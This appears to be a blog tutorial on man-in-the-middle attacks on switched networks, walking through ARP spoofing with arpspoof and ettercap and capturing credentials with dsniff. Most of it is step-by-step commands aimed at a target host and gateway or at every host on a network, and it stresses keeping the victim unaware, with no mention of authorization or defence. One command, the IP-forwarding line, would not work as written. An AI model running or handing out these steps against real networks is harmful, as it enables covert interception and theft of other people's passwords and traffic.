Dsniff is one of the most comprehensive and powerful freely-available packet-sniffing tool suites for capturing and processing authentication information. Its functionality and numerous utilities have made it a common tool used by attackers to sniff passwords and authentication information off networks.
A network switch doesn’t foward packets to everyone in the network the same way as a network hub do, and so theoretically a person in the network cannot look at other person’s traffic. There are ways however to get through this problem, which is by performing arp spoofing.
Dsniff
This post will just discuss how it is done without discussing the theory behind the process. To start is to install the necessary program, which is in this case is dsniff package which contains the arpspoof program that we need. In Ubuntu or any other Debian based distribution, it’s installable with the apt-get command as the following;
Installing (Ubuntu)
$ sudo apt-get install dsniff
Enable IP forwarding
To make sure the traffic is forwarded to the real destination as it reach our machine, the following command need to be run;
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
This will make sure the connection of the target machine is not disconnected, and nobody should realize what we’re doing.
Run ARP spoofing
The following command will tell the gateway “I am 192.168.0.100”, and the next command tells 192.168.0.100 “I am the gateway”
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
With this, all the traffic that’s supposed to go to the gateway from the machine, and the other way around, will go through our machine first, and only then forwarded to the real target. With this we can run any packet analysis tool such as tcpdump or wireshark.
Ettercap
There are programs however to make the whole process simpler. One of the favored program for this is ettercap. Ettercap can perform arp spoofing as well, among many other features that it has. In Ubuntu, the package is called ettercap-gtk;
Installing (Ubuntu)
$ sudo apt-get install ettercap-gtk
Run ARP spoofing (GUI)
Running the program with the -G switch will run it in GTK rather than in ncurses.
$ sudo ettercap -G
At the menu, choose the following;
Sniff -> Unfied sniffing
And at the prompt, choose the network interface to be used. Normally it would be eth0
Network Interface: eth0
At the menu again, choose the following to add all hosts in the network to the list
Hosts -> Scan for hosts
And following the following will do the arp spoofing for everyone in the network
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
Run ARP spoofing (command)
The following command will do the same thing as the above example, in one single command;
$ sudo ettercap -q -T -M arp // //
dsniff Command Examples
1. To monitor the network for insecure protocols:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. To save results in a database, instead of printing them:
# dsniff -w gotcha.db [other options...]
3. To read and print the results from the database:
# dsniff -r gotcha.db